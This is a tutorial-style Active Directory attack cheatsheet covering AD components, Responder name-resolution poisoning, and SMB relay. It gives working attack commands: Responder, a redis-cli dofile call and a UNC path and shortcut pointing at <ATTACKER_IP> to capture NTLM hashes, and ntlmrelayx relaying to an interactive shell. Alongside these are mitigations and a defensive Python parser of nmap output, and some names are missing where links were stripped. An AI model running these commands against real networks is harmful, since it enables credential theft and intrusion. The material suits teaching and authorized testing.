Active Directory


Active Directory (AD) allows network administrators to control computers and services and the interaction between them and the user within the domain.

The data is stored in a hierarchical structure consisting of five main components: Objects, Organizational Units, domains, trees, and forests.

  • Object: An object is an essential element in AD that represents a user, a group, a computer, an application, a printer, or a shared folder.

  • Organizational Unit (OU): An Organizational Unit is an object that acts as a "directory" of objects. It can also contain other organizational units.

  • Domain: A domain represents a group of objects which share the same AD database (AD DB).

  • Tree: A tree is a collection of one or more domains in a contiguous namespace. For instance, "" and "" are considered part of the same tree.

  • Forest: A forest is a collection of trees whose domains trust each other and share a common directory schema, application information and domain configuration.

Finally, Active Directory is a combination of services:

  • Domain Services: The primary function is to store directory data and manage communication between users and the domain controller (DC).

  • Certificate Services: Creates, manages and shares encryption certificates for exchanging information securely over the internet.

  • Lightweight Directory Services: Supports LDAP for cross-platform domain services.

  • Active Directory Federation Services: Provides users with Single Sign-On (SSO) authentication to access multiple applications in the same session, so users do not have to provide the same credentials again for each application.

  • Rights Management: Controls information rights and data access policies. It also encrypts the content, such as documents or emails.


Since Active Directory is a set of services, a domain usually exposes services such as SMTP, Web and SMB that an attacker can target to obtain credentials or access to systems. There are cheatsheets and mindmaps that an attacker can follow to gather information.

Nonetheless, a good starting point would be to gather information about the DNS, SMB, LDAP and Kerberos services.

Poison the network

With the tool Responder, an attacker can poison LLMNR, NBT-NS and mDNS name resolution on the network so that victims connect to the attacker's machine instead of the intended host. If the requested resource requires authentication, the victim sends its username and NTLMv2 challenge-response (the Net-NTLMv2 hash) to the attacker. That response can be cracked offline and the recovered password then used to access the poisoned victims' machines. Disabling LLMNR and NBT-NS through Group Policy removes this attack surface.

sudo responder -I <NETWORK_INTERFACE> -Prdwv 

Triggering responder

If an attacker has RCE on a service that runs under an AD account, or wants to perform social engineering, here are some tips to obtain NTLM hashes with Responder.

Redis

redis-cli -h <IP> -p <PORT> eval "dofile('//<ATTACKER_IP>//share')" 0


Windows command line

From a Windows command prompt, accessing a UNC path on the attacker's machine makes the host authenticate to the Responder server, which captures the user's NTLM hash.

C:\Users\victim> \\<ATTACKER_IP>\

Windows shortcut

You can create Windows shortcuts with to retrieve the NTLM hash once the victim clicks on them.

./ -l name -n shortcut -i \\\\<ATTACKER_IP>\\a -o out.lnk

SMB Relay Attack

In an SMB relay attack, an attacker captures a user's NTLM authentication and relays it to another machine on the network to gain a remote shell or file access.

This attack only works if SMB signing is not enforced on the target. You can check this by running the following command against the victim machine.

nmap --script=smb2-security-mode.nse -p445 -Pn <VICTIMS_IP>

If "Message signing enabled but not required" appears in the result, the machine is vulnerable. "Message signing enabled and required" means signing is enforced and a relayed session will be rejected, which is the setting to deploy domain-wide as the fix.
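As an added defender-side example (not part of the original cheatsheet), the following Python parses the text output of the nmap script above for several hosts and flags those where signing is only negotiable; the hostnames and addresses in the embedded sample are constructed.

```python
import re

# Constructed sample of `nmap --script=smb2-security-mode.nse -p445 -Pn` text output (not real scan data).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for fileserver.lab.example (10.10.10.5)
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for dc01.lab.example (10.10.10.1)
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.10.10.9
Host is up.
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SIGNING_RE = re.compile(r"Message signing (.+)$")


def classify_signing(status: str) -> str:
    """Map the script's signing sentence to a relay-exposure verdict."""
    status = status.strip().lower()
    if status == "enabled and required":
        return "protected"       # signing enforced: a relayed session is rejected
    if "not required" in status:
        return "relay-exposed"   # signing negotiable: the relay attack above works
    return "unknown"


def smb_signing_report(nmap_output: str) -> dict[str, str]:
    """Return {host: verdict}; hosts without script output get 'no-smb2-data'."""
    report, host = {}, None
    for line in nmap_output.splitlines():
        if m := HOST_RE.match(line):
            host = m.group(1)
            report.setdefault(host, "no-smb2-data")  # port closed, filtered, etc.
        elif (m := SIGNING_RE.search(line)) and host:
            report[host] = classify_signing(m.group(1))
    return report


if __name__ == "__main__":
    # Hosts reported as relay-exposed need "Digitally sign communications (always)" enforced.
    for host, verdict in smb_signing_report(SAMPLE_NMAP_OUTPUT).items():
        print(f"{host:28} {verdict}")
```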

Turn off the SMB server in the Responder configuration, as ntlmrelayx will be handling SMB.

sudo sed -i 's/SMB = On/SMB = Off/' /etc/responder/Responder.conf
sudo responder -I eth0 -wdr -v

Then run the Impacket module ntlmrelayx, which waits for Responder to capture an NTLM authentication and relays it to the targets listed in the file passed with -tf; the -i flag opens an interactive shell once a relay succeeds.

ntlmrelayx -tf <TARGET> -smb2support -i
